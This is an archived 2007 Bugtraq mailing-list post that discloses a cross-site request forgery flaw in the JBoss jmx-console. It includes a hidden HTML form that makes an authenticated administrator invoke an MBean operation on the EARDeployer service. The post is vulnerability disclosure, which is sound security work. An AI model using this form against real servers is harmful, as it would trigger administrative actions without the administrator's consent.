[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

JBoss jmx-console CSRF

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: JBoss jmx-console CSRF
From: buben.razuma@xxxxxxxxx
Date: 22 Feb 2007 11:04:20 -0000

Hello!
Recent message about JBoss's console made me looking at that interface again 
and it seems that it is vulnerable for the CRSF attacks.

MBean settings may be changed and operations may be invoked on behalf of the 
authenticated administrator by the hidden submitting form like follows:

<form method="post" action="http://host:port/jmx-console/HtmlAdaptor";>
   <input type="hidden" name="action" value="invokeOp">
   <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">

   <input type="hidden" name="methodIndex" value="0">
   <input type="submit" value="Invoke">
</form>

Please, correct me, if I'm wrong.

BR,
B.R.
Best regards,

Follow-Ups:
- Re: JBoss jmx-console CSRF
  - From: pagvac

Prev by Date: Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
Next by Date: WebSpell > 4.0 Authentication Bypass and arbitrary code execution
Previous by thread: Hasadya Raed
Next by thread: Re: JBoss jmx-console CSRF
Index(es):
- Date
- Thread